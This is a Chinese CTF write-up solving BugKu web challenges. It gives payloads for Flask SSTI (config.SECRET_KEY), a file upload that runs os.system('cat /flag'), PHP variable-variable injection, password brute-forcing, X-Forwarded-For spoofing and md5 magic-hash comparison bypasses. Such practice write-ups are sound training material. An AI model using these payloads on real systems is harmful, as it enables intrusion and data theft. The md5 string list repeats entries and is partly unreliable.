BugKu Web 刷题记录1

参考:

BugKu-Web-wp1

BugKu-Web-wp2

BugKu-Web-wp3

flask之ssti模版注入从零到入门

Simple_SSTI_1

F12查看源码

SSTI1.png

输入

http://114.67.175.224:17350/?flag={{config.SECRET_KEY}}

SSTI11.png

Simple_SSTI_2

SSTI2.png

Flask_FileUpload

创建111.txt并输入

import os
os.system('cat /flag')

修改文件名为111.jpg后上传文件即可得到flag

flaskfileupload.png

滑稽

huaji1.png

F12后,ctrl+f搜索flag即可

huaji.png

计算器

F12,修改长度限制,随后输入正确计算结果即可。

jisuanqi.png

GET

GET.png

POST

POST.png

矛盾

第一个条件是不能为数字,第二个条件是==比较,和整型比较是会先把字符串转化为整型,’1admin’在比较时候会变成1

maodun.png

alert

查看源代码

alert1.png

放到html中显示

alert2.png

你必须让他停下

burp suite抓包

pleasestop.png

变量1

关键在于这一句

eval("var_dump($$args);");

故传入args=GLOBALS,最后会输出​GLOBALS,flag就在其中

var1.png

头等舱

抓包查看响应包

head.png

网站被黑

提示有无后门,用御剑扫描一下发现shell.php

webhack1.png

进入后发现需要输入密码

webhack2.png

用burp爆破获得密码

webhack3.png

输入密码后得到flag

webhack4.png

本地管理员

F12查看发现编码

localadmin1.png

放进base64中解密得到密码,由于是管理员,故猜测账户为admin

localadmin2.png

输入后发现ip被ban

localadmin3.png

使用burp进行ip伪造获取flag

X-FORWARDED-FOR:127.0.0.1

localadmin4.png

源代码

F12查看得到代码

sourcecode1.png

用以下代码解码

var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
console.log(unescape(p1) + unescape('%35%34%61%61%32' + p2))

sourcecode2.png

输入密码即可得到flag

sourcecode3.png

bp

根据提示(z?????)猜测为z开头的6位密码,直接用burp爆破(注意加上标记code: ‘bugku10000’,不然所有返回字段都相同)

bp.png

备份是个好习惯

使用扫描工具扫描(SourceLeakHacker

beifen1.png

输入/index.php.bak后缀下载得到源文件index.php.bak

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');  //strstr 获得URI从'?'往后(包括'?')的字符串
$str = substr($str,1); //substr 去掉'?'
$str = str_replace('key','',$str); //把$str中的所有key去掉
parse_str($str); //把字符串解析到变量里
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){ //key1和key2的md5值相等但二者不恒等
    echo $flag."取得flag";
}
?>

构造payload

http://114.67.175.224:11514/?kekeyy1=QNKCDZO&kekeyy2=240610708

得到flag

beifen2.png

介绍一批md5是0e开头的字符串

QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

s155964671a
0e342768416822451524974117254469

s214587387a
0e848240448830537924465865611904

s214587387a
0e848240448830537924465865611904

s878926199a
0e545993274517709034328855841020

s1091221200a
0e940624217856561557816327384675

s1885207154a
0e50936721341820670084200876351